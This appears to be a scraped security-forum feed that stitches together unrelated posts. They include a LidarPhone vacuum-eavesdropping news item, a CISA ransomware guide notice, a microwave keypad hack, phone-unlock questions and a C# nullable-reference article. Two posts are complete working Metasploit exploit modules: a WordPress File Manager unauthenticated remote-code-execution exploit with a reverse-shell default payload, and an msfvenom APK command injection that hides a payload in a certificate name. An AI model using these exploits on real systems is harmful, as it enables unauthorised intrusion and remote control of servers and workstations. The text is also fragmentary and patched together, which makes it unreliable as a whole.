LiDAR readings, and analyze the sound signals collected. This would allow an attacker to listen in on private conversations, said researchers – which could reveal their credit-card data or deliver potentially incriminating information that could be used for blackmail. Researchers were able to LidarPhone on a Xiaomi Roborock vacuum cleaning robot as a proof of concept (PoC). First, they reverse-engineered the ARM Cortex-M based firmware of the robot. They then leveraged an issue in the Dustcloud software stack, which is a proxy or endpoint server for devices, in order to gain root access to the system. That’s an attack based on prior research released at DEFCON 26 in 2018. The robot vacuum attack. Credit: National University of Singapore Then, researchers collected both spoken digits – along with music played by a computer speaker and a TV sound bar – totaling more than 30,000 utterances over 19 hours of recorded audio. They said that LidarPhone achieves approximately 91 percent and 90 percent average accuracies of digit and music classifications, respectively. For instance, researchers were able to detect different sounds around the household – from a cloth rug, to the trash, to various intro music sequences for popular news channels on TV like FOX, CNN and PBS – even predicting the gender of those who were talking. At the same time, various setbacks still exist with the attack. For one, several conditions in the household could render an attack less effective. For instance, the distance away from the vacuum cleaner, and volume, of different noises has an impact on the overall effectiveness. Background noise levels and lighting conditions also have an impact on the attack. Researchers said that the attack can be mitigated by reducing the signal-to-noise ratio (SNR) of the LiDAR signal: “This may be possible if the robot vacuum-cleaner LiDARs are manufactured with a hardware interlock, such that its lasers cannot be transmitted below a certain rotation rate, with no option to override this feature in software,” they said. 
Regardless, the attack serves as an important reminder that the proliferation of smart sensing devices in our homes opens up many opportunities for acoustic side-channel attacks on private conversations. Via threatpost.com
-
Image cisa.gov On September 30, 2020, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center released a joint Ransomware Guide, which is a customer centered, one-stop resource with best practices and ways to prevent, protect and/or respond to a ransomware attack. CISA and MS-ISAC are distributing this guide to inform and enhance network defense and reduce exposure to a ransomware attack: This Ransomware Guide includes two resources: Part 1: Ransomware Prevention Best Practices Part 2: Ransomware Response Checklist Download: https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf Source
-
I don't know what spoiled food you've been eating to post so much off-topic/trolling; this is what I was referring to.
-
Mechanical keyboards are all the rage these days! People love the satisfying tactile sensation, and some go to great lengths to customise them to their exact liking. That begs the question: If we love it that much, why stop at just computer keyboards? If you think about it, there are plenty of everyday input devices in desperate need of mech-ing up! For example... a microwave keypad?? Yep you heard that right! Here is the story of how I added an RGB OLED hot-swap mechanical keypad to create the most pimped-up microwave in the entire world! Click me for high-res video with sound! Background A year ago, I picked up a used microwave for £5 at a carboot sale. It was a "Proline Micro Chef ST44": It appears to be from the early 2000s, and is pretty unremarkable in every way. But it was cheap and it works, so good enough for me! Problem! That is, until almost exactly a year later. I pressed the usual buttons to heat up my meal, but nothing happened. After the initial disbelief, my thorough investigation by randomly prodding buttons revealed that the membrane keypad was likely broken. At first a few buttons still worked, but soon all the buttons stopped responding. At this point I could have just chucked it and still got my money's worth. But it seemed like a waste just because a cheap plastic keypad failed. Plus I could save a few pounds if I fixed it instead of buying a new one. So I took it apart to see if there was anything I could do. Disassembly After removing the case, we can see the main circuit board: Microcontroller at top-middle Buzzer at top-right Blue ribbon connector for keypad at middle-left Transformer and control relays near the bottom Entire board is through-hole, but I guess if it works it works! Here is the front side: The board is well marked, and it's interesting to see it uses a Vacuum Fluorescent Display (VFD), which was already falling out of favour by the time this was made. I also noticed this board, and in fact everything inside, was designed by Daewoo, a Korean conglomerate making everything from cars to, well, this. Anyway, back to the matter at hand. I thought I could just clean up the ribbon cable contacts and call it a day. Except I didn't notice the contacts were made from carbon (graphite?) instead of the usual metal, and I rubbed some right off: So if it wasn't broken then, it's definitely broken now. Great job! Enter the Matrix (Scanning) Still, it wasn't the end of the world. The keypad almost certainly uses Matrix Scanning to interface with the controller. There is a detailed introduction to this topic on Sparkfun. But in short, matrix scanning allows us to read a large number of inputs from a limited number of controller pins. For example, there are more than 100 keys on our computer keyboard. If we simply connect each key to an input pin, the controller chip will need to have more than 100 pins! It will be bulky, difficult to route, and expensive to produce. Instead, with a little cleverness in the firmware, we can arrange the buttons in a grid of columns and rows, AKA a matrix, like this: This way, by scanning a single row and column at a time, we can determine which key(s) are pressed. Of course there are a lot more technicalities, so read more here if you want. Anyway, in the example above, instead of 4 * 4 = 16 pins, we only need 4 + 4 = 8 pins, a saving of half! And with our computer keyboard, we will only need around 20 pins instead of more than 100! Thus, we can see that Matrix Scanning simplifies the pin count and design complexity of input devices.
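As a quick illustration of the scanning loop just described (not the microwave's actual firmware, which runs on its own appliance microcontroller), here is a toy software model; the simulated "pressed switches" set stands in for real GPIO reads, and the 5x5 layout matches the microwave keypad discussed next.

```python
# Toy model of matrix scanning: drive one column at a time, read the rows,
# and report which keys are closed. Real firmware would toggle GPIO pins;
# here the "hardware" is a set of (column, row) switches currently pressed.
COLS = ["A", "B", "C", "D", "E"]
ROWS = [1, 2, 3, 4, 5]

pressed_switches = {("B", 3), ("E", 1)}   # pretend someone is holding two keys

def read_row(active_col, row):
    """Simulated row read: a row reads as closed only if a pressed switch
    connects it to the column currently being driven."""
    return (active_col, row) in pressed_switches

def scan_matrix():
    hits = []
    for col in COLS:            # drive exactly one column at a time...
        for row in ROWS:        # ...and sample every row
            if read_row(col, row):
                hits.append((col, row))
    return hits

# 5 columns + 5 rows = 10 pins are enough to tell 25 keys apart.
print(scan_matrix())    # [('B', 3), ('E', 1)]
```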
Figuring Out the Matrix Back to our microwave keypad at hand. We can see its ribbon cable comes in two parts, each with 5 pins: So if my assumptions are correct, it would be a 5x5 matrix with 25 buttons. If you scroll all the way back up, you'll find the keypad has 24 buttons, so it checks out! Now we know there are 5 columns and 5 rows, it's time to figure out which key is which. To do that, I desoldered the ribbon cable connector and replaced it with a straight male header: As a side note, the microcontroller is a TMP47C412AN designed by Toshiba. It is a 4-bit processor with 4KB of ROM and 128 Bytes of RAM. It can also directly drive Vacuum Fluorescent Tubes. So all in all, a very specialised chip for appliances. Very underpowered compared to Arduinos and STM32s. But still, it gets the job done! I connected some jumper wires: And labeled the rows and columns with 1-5 and A-E: I then put the board back, powered on, and touched each pair of wires to see which button it responds as. It took a while, but eventually I figured out the matrix location of the buttons I need: So all in all, 10 numpad keys and 4 control buttons. There are a bunch of other buttons, but I didn't bother since I don't use them anyway. I quickly whipped up a simple schematic: With that, I hard-wired some buttons on a perf board as a quick and dirty fix: It works! At least I'll have hot meals now! And it didn't cost me a dime. But as you can see, it is very messy with 10 wires coming out of the case, and I'm sure I could do better. Pimp It Up! Around the same time, I was working on duckyPad, a 15-key mechanical macropad with OLED, hot-swap, RGB, and sophisticated input automation with duckyScript: Feel free to check out the project page if you're interested! I called it a "Do-It-All Macropad", so to live up to its name, it was only natural that I get it working on my microwave too! And if I pull this off, my lowly 20-year-old second-hand broken microwave will transform into the only one in the entire world with mechanical switches and RGB lighting! Now that's what I call ... a Korean Custom 😅. However, it wasn't as easy as it sounds. There are a number of challenges: I want to use the existing duckyPad as-is, so no redesigning. I want to keep it clean and tidy, so the fewer wires the better. It has to be powered by the microwave itself too. PMM Board Right now, there are 10 wires coming out of the case and into my hand-made keypad, very messy. Ideally, with duckyPad, I want it to use only 3 wires: Power, Ground, and Data. With so few wires, they can be inside a single cable, which would be much more clean and tidy. However, the microwave controller still expects 10 wires from the keypad matrix. So that means I would need an adapter of some sort. Let's just call it PMM board. duckyPad would talk to PMM board, which in turn talks to the microwave controller. Something like this: Not too bad! However, until now we have been using real switches with the keypad matrix. But with PMM board, we will need to control the key matrix electronically to fool the microwave into thinking we pressed buttons! How do we do it? Blast From the Past It came as a bit of a surprise, but after some digging, it turned out that I solved this exact problem 3 years ago! Back then, I was trying to automate inputs of Nintendo Switch Joycons, and they also used matrix scanning for their buttons. And the answer? Analogue Switches! 
You can think of them as regular switches, but instead of pushing them with your fingers, they are controlled electronically. The chip I used is the ADG714 from Analog Devices. There are 8 switches in one chip, and they are controlled via a simple SPI protocol: I quickly designed the PMM board: It's a relatively simple board. An STM32F042F6P6 is used, and I broke out all of its pins on headers in case I need them. Since there are 14 buttons that I want to control, two ADG714s are needed. With SPI, they can be daisy-chained easily. You can see in the schematic that the analogue switches are wired up in exactly the same way as my shoddy hand-soldered keypad. Except now they can be pressed electronically by the microcontroller. I had the PCB made, and soldered on all the components: I did some preliminary testing with a continuity beeper, and it seemed to work fine, but we'll only know for sure once it is installed on the real thing. Serial-ous Talk Now that the PMM board can control the button matrix, how should duckyPad talk to it? With only 1 wire for data, I reckoned that a simple one-way serial link should be more than enough. duckyPad would send a simple serial message at 115200bps every time a key is pressed. The PMM board receives it, and if the format is correct, it would momentarily close the corresponding analog switch, simulating a button press to the microwave. I added a top-secret UARTPRINT command to the duckyScript parser, and created a profile for my microwave keypad. The keys on duckyPad are arranged as follows: Why So Negative? It's all coming together! Which brings us to the final question: How are we going to power it? I thought it would be straightforward. There is already a microcontroller on the microwave circuit board, so just tap its power and job done! Turns out, almost but not quite. Examining the circuit board in detail, it turns out the whole thing runs on negative voltages. We can see it gets -26V from the transformer, steps it down to -12V, then again to -5V. The voltage regulator is an S7905PIC fixed-negative-voltage regulator, further confirming this theory. I'm not sure why it is designed this way, probably has something to do with the AC transformer. Still, it doesn't actually matter that much, as it's just from a different point of reference. I tapped two power wires from the circuit board to power the PMM board, and in turn, duckyPad: To reduce confusion, I marked them 0V and -5V. Usually, we would connect 0V to GND, and a positive voltage to VCC. But in this case, 0V is actually at the higher potential. So all I needed to do was connect -5V to GND, and 0V to VCC. The potential difference is still 5V, so everything works. (Eagle-eyed viewers might notice I also covered the buzzer with a sticker. It was so loud!) A Duckin' Great Time! I reinstalled the circuit board, hooked everything up and did a quick test, and it works! You can see the 3 wires going from the duckyPad debug header to the PMM board, as well as the 10 wires going into the control board where the blue ribbon cable used to be. I attached the duckyPad to the microwave, chopped off the ends of a cheap USB cable, and used the 4 wires inside to connect everything up through a vent at the bottom. Voilà! It's done! The first and (probably) only microwave in the entire universe with mechanical switches, OLED, and RGB lighting! Have you ever experienced the crisp and clicky tactile and audible perfection of Gateron Greens while heating up some frozen junk food at 2am because you're too lazy to cook? Well, I have, so there's that!
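Looking back at the one-way serial link and the two daisy-chained ADG714s, here is a toy model of what the PMM board does for each incoming message. The real firmware is C on the STM32; the key names, the text-line message format, the switch-to-matrix wiring and the bit ordering below are all our own assumptions for illustration, and the SPI transfer is stubbed out with a print.

```python
import time

# Map a key name to its (column, row) position in the microwave's 5x5 matrix,
# and each matrix position to one of the 16 ADG714 switches (2 chips x 8).
# Both tables are illustrative assumptions, not the actual board wiring.
KEY_TO_MATRIX = {"1": ("C", 2), "start": ("E", 5)}
MATRIX_TO_SWITCH = {("C", 2): 0, ("E", 5): 9}

def spi_transfer_16(bits):
    """Stand-in for the real SPI transfer into two daisy-chained ADG714s
    (16 bits total, one bit per analogue switch)."""
    print(f"SPI <- {bits:016b}")

def press_key(key, hold_s=0.05):
    """Close the analogue switch for `key`, wait long enough for the
    microwave's own matrix scan to notice it, then open all switches."""
    switch = MATRIX_TO_SWITCH[KEY_TO_MATRIX[key]]
    spi_transfer_16(1 << switch)   # close exactly one switch
    time.sleep(hold_s)
    spi_transfer_16(0)             # release

def handle_serial_line(line):
    """One-way protocol from duckyPad: assume one plain-text key name per
    line at 115200 baud; ignore anything we don't recognise."""
    key = line.strip().lower()
    if key in KEY_TO_MATRIX:
        press_key(key)

# Simulated incoming messages (on real hardware these would arrive over UART).
for msg in ["1\n", "start\n", "bogus\n"]:
    handle_serial_line(msg)
```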
Click me for high-res video with sound! I want one too! If you're interested in duckyPad, you can learn more about it and get one here! And if you want the whole package, unfortunately it would be much more involved. Each microwave has a different keypad matrix layout, so you'll need to figure it out, and design and build a PMM board yourself. Not a small feat, but at least all the information is here! If you do go down this path, let me know if you have any questions! Of course there are high voltages and the potential for microwave radiation when you take it apart, so be careful! Other Stuff I've done a few other fun projects over the years, feel free to check them out: Daytripper: Hide-my-windows Laser Tripwire: Saves the day while you slack off! exixe: Miniature Nixie Tube driver module: Eliminate the need for vintage chips and multiplexing circuits. From Arduino to STM32: A detailed tutorial to get you started with STM32 development. List of all my repos Questions or Comments? Please feel free to open an issue, ask in the official duckyPad discord, DM me on discord dekuNukem#6998, or email dekuNukem@gmail.com for inquiries. Source
-
It wasn't encrypted, it just has a pattern lock. I only found it now, after years (2016, I think): you can imagine I no longer know the pattern. 2. There's no way I can swap the board; the guys at the service shop would do the backup for me, and I want to avoid that situation. 3. I followed a YouTube tutorial where an Indian guy explains how to recover it with the SDK and ADB (debug), but it asks me to turn the AV off, and I won't risk it.
-
Hi, I have a Lenovo A2016a40 phone; a 17" wheel rim ran over it. I want to copy everything off it to my PC (holiday pictures, etc.). It has a pattern lock and I no longer know it (I used to connect it to a USB adapter with a mouse). I installed sync, but... I can't tap "allow" on the phone. Thank you!
-
The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', 'Description' => %q{ The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Souza (w4fz5uck5)', # initial discovery and PoC 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module ], 'References' => [ [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], [ 'CVE', '2020-25213' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'WordPress File Manager 6.0-6.8', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? 
# check the plugin version from readme check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') end def exploit # base path to File Manager plugin file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') # filename of the file to be uploaded/created filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php" register_file_for_cleanup(filename) case datastore['COMMAND'] when 'upload' elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) when 'mkfile+put' elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) end payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) print_status("#{peer} - Payload is at #{payload_uri}") # execute the payload send_request_cgi('uri' => normalize_uri(payload_uri)) end # make it easier to switch between "upload" and "mkfile+put" exploit methods def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) filename = opts['filename'] # prep for exploit post_data = Rex::MIME::Message.new post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"') case elfinder_cmd when 'upload' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") when 'mkfile' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(filename, nil, nil, 'form-data; name="name"') when 'put' post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"') end res = send_request_cgi( 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 end end Source
-
Rapid7 Metasploit Framework msfvenom APK Template Command Injection
Kev posted a topic in Exploituri
This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected includes Metasploit Framework versions 6.0.11 and below and Metasploit Pro versions 4.18.0 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip/jar' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x <crafted_file.apk> }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Steven' # @justinsteven ], 'References' => [ ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'], ['CVE', '2020-7384'], ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22\x2c\x5c\x0a\x0d" }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-10-29' ) ) register_options([ OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk']) ]) end def build_x509_name name = "CN=';(#{payload.encoded}) >&- 2>&- & #" OpenSSL::X509::Name.parse(name) end def generate_signing_material key = OpenSSL::PKey::RSA.new(2048) cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = 1 cert.subject = cert.issuer = build_x509_name cert.public_key = key.public_key cert.not_before = Time.now # FIXME: this will break in the year 2037 on 32-bit systems cert.not_after = cert.not_before + 1.year # Self-sign the certificate, otherwise the victim's keytool gets unhappy cert.sign(key, OpenSSL::Digest::SHA256.new) [cert, key] end def exploit print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash') apk = Rex::Zip::Jar.new apk.build_manifest cert, key = generate_signing_material apk.sign(key, cert) data = apk.pack file_create(data) end end Source-
- 1
-
^ {[ In caz* (keyboard slip: u is next to i) ]} \ You should have specified. A word of warning to the amateurs: do NOT call back, these are premium-rate (reverse-charge) numbers; you sit there listening to music and end up paying a bill worth as much as all the tickets to Cenaclul Flacara.
-
It's no secret that Microsoft has been working on the eighth version of the C# language for quite a while. The new language version (C# 8.0) is already available in the recent release of Visual Studio 2019, but it's still in beta. This new version is going to have a few features implemented in a somewhat non-obvious, or rather unexpected, way. Nullable Reference types are one of them. This feature is announced as a means to fight Null Reference Exceptions (NRE).

It's good to see the language evolve and acquire new features to help developers. By coincidence, some time ago we significantly enhanced the ability of PVS-Studio's C# analyzer to detect NREs. And now we're wondering whether static analyzers in general, and PVS-Studio in particular, should still bother to diagnose potential null dereferences, since, at least in new code that makes use of Nullable Reference, such dereferences will become "impossible". Let's try to clear that up.

Pros and cons of the new feature

One reminder before we continue: the latest beta version of C# 8.0, available as of this writing, has Nullable Reference types disabled by default, i.e. the behavior of reference types hasn't changed. So what exactly are nullable reference types in C# 8.0 if we enable this option? They are basically the same good old reference types, except that now you'll have to add '?' after the type name (for example, string?), similarly to Nullable<T>, i.e. nullable value types (for example, int?). Without the '?', our string type will now be interpreted as a non-nullable reference, i.e. a reference type that can't be assigned null.

Null Reference Exception is one of the most vexing exceptions to get into your program because it doesn't say much about its source, especially if the throwing method contains a number of dereference operations in a row. The ability to prohibit null assignment to a variable of a reference type looks cool, but what about those cases where passing a null to a method has some execution logic depending on it?

Instead of null, we could, of course, use a literal, a constant, or simply an "impossible" value that logically can't be assigned to the variable anywhere else. But this poses a risk of replacing a crash of the program with "silent" but incorrect execution, which is often worse than facing the error right away. What about throwing an exception then? A meaningful exception thrown in the location where something went wrong is always better than an NRE somewhere up or down the stack. But it's only good in your own project, where you can correct the consumers by inserting a try-catch block and it's solely your responsibility. When developing a library that uses (non-) Nullable Reference, we need to guarantee that a certain method always returns a value. After all, it's not always possible (or at least easy), even in your own code, to replace the returning of null with exception throwing (since it may affect too much code).

Nullable Reference can be enabled either at the global project level, by adding the NullableContextOptions property with the value enable, or at the file level, by means of the preprocessor directive:

#nullable enable

string cantBeNull = string.Empty;
string? canBeNull = null;
cantBeNull = canBeNull!;

The Nullable Reference feature makes types more informative. The method signature gives you a clue about its behavior: whether it has a null check or not, whether it can return null or not. Now, when you try to use a nullable reference variable without checking it, the compiler will issue a warning.
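As a quick illustration of that last point, here is a minimal sketch (the class, method and parameter names are made up for the example): the compiler flags an unchecked dereference of a nullable reference, but accepts one that sits behind a null check.

#nullable enable

public static class NullableWarningDemo
{
    public static int Describe(string? canBeNull, string cantBeNull)
    {
        // Uncommenting the next line produces compiler warning CS8602
        // ("Dereference of a possibly null reference"):
        // int oops = canBeNull.Length;

        // No warning here: the compiler sees the null check and narrows the type.
        int checkedLength = canBeNull != null ? canBeNull.Length : 0;

        // No warning here either: a non-nullable reference is assumed to hold a value.
        return checkedLength + cantBeNull.Length;
    }
}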
Such warnings are pretty convenient when you use third-party libraries, but they also add a risk of misleading the library's user, as it's still possible to pass null using the new null-forgiving operator (!). That is, adding just one exclamation point can break all further assumptions about the interface using such variables:

#nullable enable

String GetStr()
{
    return _count > 0 ? _str : null!;
}

String str = GetStr();
var len = str.Length;

Yes, you can argue that this is bad programming and nobody would write code like that for real, but as long as this can potentially be done, you can't feel safe relying only on the contract imposed by the interface of a given method (saying that it can't return null). By the way, you could write the same code using several ! operators, as C# now allows you to do so (and such code is perfectly compilable):

cantBeNull = canBeNull!!!!!!!;

By writing it this way we, so to say, stress the idea: "look, this may be null!!!" (in our team, we call this "emotional" programming). In fact, when building the syntax tree, the compiler (from Roslyn) interprets the ! operator in the same way as it interprets regular parentheses, which means you can write as many !'s as you like - just like with parentheses. But if you write enough of them, you can "knock down" the compiler. Maybe this will get fixed in the final release of C# 8.0.

Similarly, you can circumvent the compiler warning when accessing a nullable reference variable without a check:

canBeNull!.ToString();

Let's add more emotions:

canBeNull!!!?.ToString();

You'll hardly ever see syntax like that in real code, though. By writing the null-forgiving operator we tell the compiler, "This code is okay, check not needed." By adding the Elvis operator we tell it, "Or maybe not; let's check it just in case."

Now, you can reasonably ask why you can still have null assigned to variables of non-nullable reference types so easily if the very concept of these types implies that such variables can't have the value null. The answer is that "under the hood", at the IL code level, our non-nullable reference type is still... the good old "regular" reference type, and the entire nullability syntax is actually just an annotation for the compiler's built-in analyzer (which, we believe, isn't quite convenient to use, but more on that later). Personally, we don't find it a "neat" solution to include the new syntax as simply an annotation for a third-party tool (even one built into the compiler), because the fact that this is just an annotation may not be obvious at all to the programmer, as this syntax is very similar to the syntax for nullable structs yet works in a totally different way.

Getting back to other ways of breaking Nullable Reference types. As of the moment of writing this article, when you have a solution comprised of several projects, passing a variable of a reference type, say, String, from a method declared in one project to a method in another project that has NullableContextOptions enabled will make the compiler assume it's dealing with a non-nullable String, and the compiler will remain silent. And that's despite the tons of [Nullable(1)] attributes added to every field and method in the IL code when Nullable References are enabled. These attributes, by the way, should be taken into account if you use reflection to handle attributes and assume that the code contains only your custom ones. Such a situation may cause additional trouble when adapting a large code base to the Nullable Reference style.
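To see what that reflection caveat means in practice, here is a minimal sketch (the Dto type is made up for the example): with Nullable References enabled, enumerating a member's attributes can surface compiler-emitted nullability metadata such as System.Runtime.CompilerServices.NullableAttribute, depending on how the compiler chose to encode it, alongside anything you wrote by hand.

#nullable enable
using System;
using System.Reflection;

public class Dto
{
    // A hand-written attribute would also show up in the listing below.
    public string? Comment { get; set; }
}

public static class NullableMetadataDemo
{
    public static void Main()
    {
        PropertyInfo property = typeof(Dto).GetProperty(nameof(Dto.Comment))!;

        // Depending on the compiler's encoding, this may print
        // System.Runtime.CompilerServices.NullableAttribute (related context
        // attributes may instead sit on the containing type or assembly),
        // so "all attributes" is no longer the same set as
        // "all attributes written by hand".
        foreach (CustomAttributeData attribute in property.CustomAttributes)
        {
            Console.WriteLine(attribute.AttributeType.FullName);
        }
    }
}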
Adapting a large code base is a process that will likely run for a while, project by project. If you are careful, you can, of course, integrate the new feature gradually, but if you already have a working project, any changes to it are dangerous and undesirable (if it works, don't touch it!). That's why we made sure that you don't have to modify your source code or annotate it to detect potential NREs when using the PVS-Studio analyzer. To check locations that could throw a NullReferenceException, simply run the analyzer and look for V3080 warnings. No need to change the project's properties or the source code. No need to add directives, attributes, or operators. No need to change legacy code.

When adding Nullable Reference support to PVS-Studio, we had to decide whether the analyzer should assume that variables of non-nullable reference types always have non-null values. After investigating the ways this guarantee could be broken, we decided that PVS-Studio shouldn't make such an assumption. After all, even if a project uses non-nullable reference types all the way through, the analyzer can add to this feature by detecting those specific situations where such variables could still have the value null.

How PVS-Studio looks for Null Reference Exceptions

The dataflow mechanisms in PVS-Studio's C# analyzer track possible values of variables during the analysis process. This also includes interprocedural analysis, i.e. tracking down possible values returned by a method, its nested methods, and so on. In addition to that, PVS-Studio remembers variables that could be assigned a null value. Whenever it sees such a variable being dereferenced without a check, whether in the current code under analysis or inside a method invoked from this code, it will issue a V3080 warning about a potential Null Reference Exception.

The idea behind this diagnostic is to have the analyzer get angry only when it sees a null assignment. This is the principal difference between our diagnostic's behavior and that of the compiler's built-in analyzer handling Nullable Reference types. The built-in analyzer will point at each and every dereference of an unchecked nullable reference variable - provided it hasn't been misled by the use of the ! operator or even just a complicated check (it should be noted, however, that absolutely any static analyzer, PVS-Studio being no exception here, can be "misled" one way or another, especially if you are intent on doing so).

PVS-Studio, on the other hand, warns you only if it sees a null (whether within the local context or the context of an outside method). Even if the variable is of a non-nullable reference type, the analyzer will keep pointing at it if it sees a null assignment to that variable. This approach, we believe, is more appropriate (or at least more convenient for the user), since it doesn't demand "smearing" the entire code with null checks to track potential dereferences - after all, that option was available even before Nullable References were introduced, for example, through the use of contracts.

What's more, the analyzer can now provide better control over non-nullable reference variables themselves. If such a variable is used "fairly" and never gets assigned null, PVS-Studio won't say a word. If the variable is assigned null and then dereferenced without a prior check, PVS-Studio will issue a V3080 warning:

#nullable enable

String GetStr()
{
    return _count > 0 ? _str : null!;
}

String str = GetStr();
var len = str.Length;    <== V3080: Possible null dereference. Consider inspecting 'str'.
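To make the "nested methods" part of that description concrete, here is a minimal sketch (the class and its members are invented for the example; it illustrates the general idea of interprocedural value tracking rather than any specific analyzer's output): the only null assignment sits two calls away from the dereference, so only dataflow that crosses method boundaries can connect the two.

#nullable enable

public class InterproceduralDemo
{
    // The only null in this class lives here.
    private string? _cache = null;

    private string? ReadCache() => ReadCacheCore();
    private string? ReadCacheCore() => _cache;

    public int CachedLength()
    {
        // No null literal appears in this method, but the possible null value
        // can be traced through ReadCache -> ReadCacheCore -> _cache, which is
        // the kind of chain interprocedural dataflow analysis follows.
        return ReadCache().Length;
    }
}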
Now let's take a look at some examples demonstrating how this diagnostic is triggered by the code of Roslyn itself. We already checked this project recently, but this time we'll be looking only at potential Null Reference Exceptions not mentioned in the previous articles. We'll see how PVS-Studio detects potential NREs and how they can be fixed using the new Nullable Reference syntax.

V3080 [CWE-476] Possible null dereference inside method. Consider inspecting the 2nd argument: chainedTupleType. Microsoft.CodeAnalysis.CSharp TupleTypeSymbol.cs 244

NamedTypeSymbol chainedTupleType;
if (_underlyingType.Arity < TupleTypeSymbol.RestPosition)
{
    ....
    chainedTupleType = null;
}
else
{
    ....
}

return Create(ConstructTupleUnderlyingType(firstTupleType, chainedTupleType, newElementTypes), elementNames: _elementNames);

As you can see, the chainedTupleType variable can be assigned the null value in one of the execution branches. It is then passed to the ConstructTupleUnderlyingType method and used there after a Debug.Assert check. It's a very common pattern in Roslyn, but keep in mind that Debug.Assert is removed in the release version. That's why the analyzer still considers the dereference inside the ConstructTupleUnderlyingType method dangerous. Here's the body of that method, where the dereference takes place:

internal static NamedTypeSymbol ConstructTupleUnderlyingType(
    NamedTypeSymbol firstTupleType,
    NamedTypeSymbol chainedTupleTypeOpt,
    ImmutableArray<TypeWithAnnotations> elementTypes)
{
    Debug.Assert(chainedTupleTypeOpt is null == elementTypes.Length < RestPosition);
    ....
    while (loop > 0)
    {
        ....
        currentSymbol = chainedTupleTypeOpt.Construct(chainedTypes);
        loop--;
    }

    return currentSymbol;
}

It's actually a matter of dispute whether the analyzer should take Asserts like that into account (some of our users want it to) - after all, the analyzer does take contracts from System.Diagnostics.Contracts into account. Here's one small real-life example from our experience of using Roslyn in our own analyzer. While adding support for the latest version of Visual Studio recently, we also updated Roslyn to version 3. After that, PVS-Studio started crashing on certain code it had never crashed on before. The crash, accompanied by a Null Reference Exception, would occur not in our code but in the code of Roslyn. Debugging revealed that the code fragment where Roslyn was now crashing had that very kind of Debug.Assert-based null check several lines higher - and that check obviously didn't help.

